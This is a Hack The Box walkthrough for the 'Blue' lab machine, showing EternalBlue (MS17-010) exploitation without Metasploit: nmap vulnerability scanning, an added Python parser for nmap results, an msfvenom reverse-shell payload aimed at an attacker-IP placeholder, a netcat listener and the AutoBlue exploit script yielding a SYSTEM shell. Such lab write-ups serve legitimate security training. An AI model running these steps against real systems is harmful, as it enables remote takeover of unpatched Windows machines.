Hack The Box - Blue Walkthrough without Metasploit

Last updated 4 years ago

Enumeration

To enumerate the box we will use the following nmap command:

nmap -sC -sV -A 10.10.10.40

As we can see, port 445 (SMB) is open, and the scan even discloses some important information: Windows 7 Professional 7601 Service Pack 1. Let's run a new enumeration, this time with vulnerability scripts:

We will be using two flags:

--script: applies the "vuln" (vulnerability) category of NSE scripts to the scanned ports of the box.

-p: scans only the ports listed, in our case 445, since it is the only one we are currently interested in.

nmap --script vuln -p445 10.10.10.40
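As an added example that is not part of the original walkthrough, the following Python triages the XML output of the vuln scan above (nmap -oX) and extracts the structured smb-vuln-ms17-010 result, so a scan of a whole network can be filtered down to hosts still exposing MS17-010. The XML below is constructed to mirror this box's result and follows the element layout of nmap's vuln library output.

```python
import xml.etree.ElementTree as ET

# Constructed nmap -oX excerpt modelled on the vuln library's structured output; sample data, not the original scan.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap --script vuln -p445 -oX - 10.10.10.40">
  <host>
    <address addr="10.10.10.40" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds" product="Windows 7 Professional 7601 Service Pack 1 microsoft-ds"/>
        <script id="smb-vuln-ms17-010" output="VULNERABLE">
          <table key="CVE-2017-0143">
            <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
            <elem key="state">VULNERABLE</elem>
            <elem key="risk_factor">HIGH</elem>
          </table>
        </script>
        <script id="smb-vuln-ms10-054" output="false"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# nmap's vulns library uses states like VULNERABLE, VULNERABLE (Exploitable), LIKELY
# VULNERABLE and NOT VULNERABLE; only the first two count as confirmed here.
def parse_vuln_findings(xml_text):
    """Return one finding per open port/script table whose state is VULNERABLE."""
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue                      # closed/filtered ports carry no script tables
            svc = port.find("service")
            product = svc.get("product", "") if svc is not None else ""
            for script in port.findall("script"):
                for table in script.findall("table"):
                    elems = {e.get("key"): (e.text or "").strip() for e in table.findall("elem")}
                    if elems.get("state", "").upper().startswith("VULNERABLE"):
                        findings.append({"host": addr, "port": int(port.get("portid")),
                                         "script": script.get("id"), "cve": table.get("key"),
                                         "risk": elems.get("risk_factor", ""), "product": product})
    return findings

if __name__ == "__main__":
    for f in parse_vuln_findings(SAMPLE_NMAP_XML):
        print(f"{f['host']}:{f['port']} {f['cve']} via {f['script']} risk={f['risk']} [{f['product']}]")
```

Feed it a real file with `ET.parse(path).getroot()` instead of the constructed string; scripts that report "false" produce no table and are skipped.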

Something really interesting catches our eye: CVE-2017-0143 (MS17-010). With a quick Google search...

Finding the Vulnerability

...we find the EternalBlue exploit, with lots of Metasploit modules, but we will not fall into the temptation of using MSF (which is a really useful tool, but not our goal here).

Non Metasploit exploit

If we search a bit more, we find this excellent GitHub repository:

Let's clone this repository:

git clone https://github.com/3ndG4me/AutoBlue-MS17-010

There are several scripts in the folder; the first one we will use is eternal_checker.py, to confirm the target is vulnerable:

python eternal_checker.py 10.10.10.40 -port 445

Exploitation

Generate a Payload

Now we navigate to the shellcode folder to generate our payload. This is done in two steps; first we assemble the kernel shellcode:

nasm -f bin eternalblue_kshellcode_x64.asm -o evilKernel.bin

And now our msfvenom payload:

msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f raw -o evilReverse.bin

Now we concatenate the two into a single payload, kernel shellcode first:

cat evilKernel.bin evilReverse.bin > evilPayload.bin

Executing the Exploit

First of all we need a netcat listener, on the port we set as LPORT in the msfvenom payload:

nc -nvlp 443

Now we need to decide which Python script to use. From our previous enumeration we know the target OS is Windows 7, so we will use eternalblue_exploit7.py.

In order to run the exploit we need some parameters: the victim IP, the mixed payload, and numGroomConn (the number of groom connections):

This attempt failed. Now we have to change the number of groom connections until we find a value that works; we can keep increasing it until the exploit succeeds.

Pwnd

After some tries increasing the number of groom connections, we were able to get a shell as NT Authority.

[Screenshots in the original post: Blue enumeration, EternalBlue vulnerability, Eternal Checker, generating Kernel.bin, msfvenom payload, mixing both parts, eternalblue_exploit7.py, failing attempt, after some tries.]